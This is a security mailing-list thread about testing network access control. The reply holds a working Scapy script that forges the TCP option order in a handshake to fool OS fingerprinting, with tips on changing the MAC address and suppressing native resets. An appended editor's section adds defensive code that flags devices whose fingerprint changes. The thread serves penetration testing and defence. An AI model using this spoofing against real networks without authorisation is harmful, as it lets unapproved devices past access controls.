> > As I asked about recently, I'll soon be testing a NAC type device and so I
> > was wondering, is there a tool which will let me watch a device then clone
> > its network fingerprint? By fingerprint I mean things like network settings
> > such as TTLs but also open ports (probably couldn't spoof the service but
> > at least open the port).
> >
> > I know there is a tool that is designed to fool attackers by having a list
> > of different OSes and you choose which you want to pretend to be, but rather
> > than pick from a list I want to be able to point it at another machine and
> > say "clone that".
>
> What do you do for IP? Do you work out what is on the network through passive
> observation and then pick something that looks appropriate?
>
> Any other suggestions on testing/avoiding NAC? I've not tested with one in
> action before and don't have anything to practice against. This particular
> test is to see if it is doing its job properly so specifics on testing a NAC
> would be good.
When I'm testing a NAC system I connect with a standard Windows or OS X client
first, and explore what's accessible, trying to identify the NAC vendor. From
there I'll do some passive analysis, and try to determine if there are any
exception policies applied (such as a rule for iPads not having to
authenticate, etc.).
NAC vendors commonly perform OS fingerprinting to identify devices, and
products like Cisco ISE use the fingerprints to apply rules to devices. They
can't continually fingerprint the devices though, so they perform an initial
analysis, and then subsequent analysis per the NAC configuration (IIRC, Cisco
ISE's re-check interval has a minimum delay of 15 minutes, with a default of
"check once"). I'll typically change my MAC to get another IP, and use Scapy
to complete a 3-way handshake to any accessible host, just to trick the OS
fingerprinting rule (Cisco ISE checks TCP option parameters including order of
options, which is hard to spoof on Linux, and impossible on Windows, but Scapy
does it just fine). Here is a sample script I have lying around:
#!/usr/bin/env python
# Complete a TCP 3-way handshake with hand-built packets so the SYN carries the
# TCP option layout we choose instead of the one the local stack would send.
import random
import sys
from scapy.all import IP, TCP, sr1, send

DSTIP = "10.10.10.110"  # Specify your target where NAC will observe it
# Pick the source port once; a RandNum would be re-rolled for every packet sent
SPORT = random.randint(1024, 65535)
ip = IP(dst=DSTIP, flags="DF", ttl=64)
# TCP options in the exact order they should appear on the wire
tcpopt = [("MSS", 1460), ("NOP", None), ("WScale", 2), ("NOP", None),
          ("NOP", None), ("Timestamp", (123, 0)), ("SAckOK", ""), ("EOL", None)]
SYN = TCP(sport=SPORT, dport=80, flags="S", seq=10, window=0xffff, options=tcpopt)
SYNACK = sr1(ip/SYN, timeout=5)  # Send the packet and record the response as SYNACK
if SYNACK is None or not SYNACK.haslayer(TCP):
    sys.exit("No SYN/ACK from %s:80, giving up" % DSTIP)
my_ack = SYNACK[TCP].seq + 1  # Use the SYN/ACK response to get initial seq. number
ACK = TCP(sport=SPORT, dport=80, flags="A", seq=11, ack=my_ack, window=0xffff)
send(ip/ACK)
data = ("GET / HTTP/1.1\r\nHost: " + DSTIP + "\r\n"
        "User-Agent: Mozilla/5.0 (iPad; CPU OS 5_0 like Mac OS X) AppleWebKit/534.46 "
        "(KHTML, like Gecko) Version/5.1 [...]\r\n\r\n")
PUSH = TCP(sport=SPORT, dport=80, flags="PA", seq=11, ack=my_ack, window=0xffff)
send(ip/PUSH/data)
# Tear down; the RST has to carry the sequence number that follows the data we sent
RST = TCP(sport=SPORT, dport=80, flags="R", seq=11 + len(data), ack=0, window=0xffff)
send(ip/RST)
Before you use this script, make sure you apply an iptables rule to stop the
Linux native stack from sending a TCP RST to the spoofed TCP SYN.
After I get some of this traffic through, I do some more testing to see what my
connectivity looks like with netcat or manual Scapy connections.
HTH,
-Josh
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
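Added example (editor's code, not Josh's script and not part of the original thread): the profiler's side of the same TCP fingerprint. Josh's point is that a NAC which profiles once, from the SYN's TTL/DF/window/option order, can be handed a crafted SYN at profiling time while every later connection comes from the native stack. The code below parses that signature straight out of raw IPv4/TCP bytes (no Scapy needed, so it runs anywhere) and keeps one signature list per device, flagging any device whose SYN signature changes between observations, which is exactly the re-check a "check once" policy never performs. All packets are constructed in-line with a small builder; the "Linux-like" option layout is a typical one and an assumption, the crafted layout mirrors the option order in Josh's script, and the device ids and addresses are made up.

```python
"""Derive a TCP SYN fingerprint (TTL, DF, window, option layout) from raw
IPv4/TCP bytes and flag devices whose fingerprint changes between observations.
Every packet here is constructed in-line; nothing is captured from a network."""
import socket
import struct
from collections import defaultdict

OPTION_NAMES = {0: "EOL", 1: "NOP", 2: "MSS", 3: "WScale", 4: "SAckOK", 8: "Timestamp"}


def parse_tcp_options(raw):
    """Walk a TCP options block and return (name, value) pairs in wire order."""
    opts, i = [], 0
    while i < len(raw):
        kind = raw[i]
        if kind == 0:                      # EOL terminates the list; padding follows
            opts.append(("EOL", None))
            break
        if kind == 1:                      # NOP is a single byte with no length field
            opts.append(("NOP", None))
            i += 1
            continue
        if i + 1 >= len(raw) or raw[i + 1] < 2 or i + raw[i + 1] > len(raw):
            raise ValueError("malformed TCP option at offset %d" % i)
        length, body = raw[i + 1], raw[i + 2:i + raw[i + 1]]
        name = OPTION_NAMES.get(kind, "opt%d" % kind)
        if name == "MSS" and len(body) == 2:
            value = struct.unpack("!H", body)[0]
        elif name == "WScale" and len(body) == 1:
            value = body[0]
        else:
            value = body                   # timestamps etc. kept raw; only presence and order matter
        opts.append((name, value))
        i += length
    return opts


def syn_signature(packet):
    """Return 'ttl:DF|ND:window:options' for an IPv4 pure SYN, or None for anything else."""
    ver_ihl, _, _, _, flags_frag, ttl, proto = struct.unpack("!BBHHHBB", packet[:10])
    if ver_ihl >> 4 != 4 or proto != 6:
        return None
    tcp = packet[(ver_ihl & 0x0F) * 4:]
    _, _, _, _, off_flags, window = struct.unpack("!HHIIHH", tcp[:16])
    flags = off_flags & 0x1FF
    if not flags & 0x02 or flags & 0x10:   # SYN set, ACK clear: only the handshake opener
        return None
    layout = []
    for name, value in parse_tcp_options(tcp[20:(off_flags >> 12) * 4]):
        layout.append("%s=%d" % (name, value) if name in ("MSS", "WScale") else name)
    df = "DF" if flags_frag & 0x4000 else "ND"
    return "%d:%s:%d:%s" % (ttl, df, window, ",".join(layout))


def build_syn(src, dst, ttl, df, window, options):
    """Construct a minimal IPv4/TCP SYN as test input (checksums left at zero)."""
    options += b"\x00" * ((-len(options)) % 4)          # pad options to a 32-bit boundary
    tcp_len = 20 + len(options)
    tcp = struct.pack("!HHIIHHHH", 40000, 80, 10, 0,
                      ((tcp_len // 4) << 12) | 0x02, window, 0, 0) + options
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + tcp_len, 0, 0x4000 if df else 0,
                     ttl, 6, 0, socket.inet_aton(src), socket.inet_aton(dst))
    return ip + tcp


def profile_drift(observations):
    """observations: iterable of (device_id, packet). Returns ({device_id: [signatures]},
    [device_ids whose SYN signature changed]), the check a one-shot profiler never makes."""
    seen = defaultdict(list)
    for device, packet in observations:
        sig = syn_signature(packet)
        if sig and sig not in seen[device]:
            seen[device].append(sig)
    return dict(seen), sorted(d for d, sigs in seen.items() if len(sigs) > 1)


# Constructed samples (assumptions): LINUX_OPTS is a typical Linux SYN option layout;
# CRAFTED_OPTS is the option order used by the Scapy script in the message above.
LINUX_OPTS = (b"\x02\x04\x05\xb4" b"\x04\x02" b"\x08\x0a" + b"\x00" * 8 + b"\x01" b"\x03\x03\x07")
CRAFTED_OPTS = (b"\x02\x04\x05\xb4" b"\x01" b"\x03\x03\x02" b"\x01\x01"
                b"\x08\x0a" + struct.pack("!II", 123, 0) + b"\x04\x02" b"\x00")
DST = "10.10.10.110"
SAMPLE_OBSERVATIONS = [
    ("dev-A", build_syn("10.10.10.50", DST, 64, True, 29200, LINUX_OPTS)),     # native stack throughout
    ("dev-B", build_syn("10.10.10.51", DST, 64, True, 0xffff, CRAFTED_OPTS)),  # crafted SYN at profiling time
    ("dev-B", build_syn("10.10.10.51", DST, 64, True, 29200, LINUX_OPTS)),     # later native-stack SYN
]

if __name__ == "__main__":
    sigs, drifted = profile_drift(SAMPLE_OBSERVATIONS)
    for device, seen in sigs.items():
        print(device, "->", seen)
    print("signature drift on:", drifted)
```

Run as-is and dev-B is reported because its first SYN says "MSS=1460,NOP,WScale=2,NOP,NOP,Timestamp,SAckOK,EOL" with a 65535 window while the next one carries the ordinary Linux layout with a 29200 window. Keying on a device id (MAC, switch port, or DHCP lease) rather than the IP is deliberate, since the message describes changing MAC to obtain a new IP; whatever the NAC uses as the device identity is what the comparison should be anchored to.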